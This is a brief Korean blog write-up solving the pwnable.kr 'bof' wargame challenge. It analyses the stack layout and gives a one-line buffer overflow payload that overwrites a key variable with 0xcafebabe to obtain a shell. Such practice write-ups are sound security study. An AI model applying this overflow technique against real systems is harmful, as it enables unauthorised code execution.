write-up/pwnable
[pwnable.kr] bof
★ 문제 분석
overflowme 배열이 32byte 선언되어 있다.
key 값이 0xcafebabe여야 쉘을 딸 수 있다.
func+39> [ebp-0x28] = overflowme
0x28(hex) = 40(dex)
| overflowme[32] |
| dummy[8] |
| SFP[4] |
| RET[4] |
| argc[4] |
| argv |
★ 페이로드
"\x90"*52+"\xbe\xba\xfe\xca"
'write-up > pwnable' 카테고리의 다른 글
| [pwnable.kr] random (0) | 2019.09.29 |
|---|---|
| [pwnable.kr] passcode (0) | 2019.09.29 |
| [pwnable.kr] collision (0) | 2019.09.26 |
| [pwnable.kr] fd (0) | 2019.09.23 |
| [LOB] LOB TIP (0) | 2019.09.15 |
댓글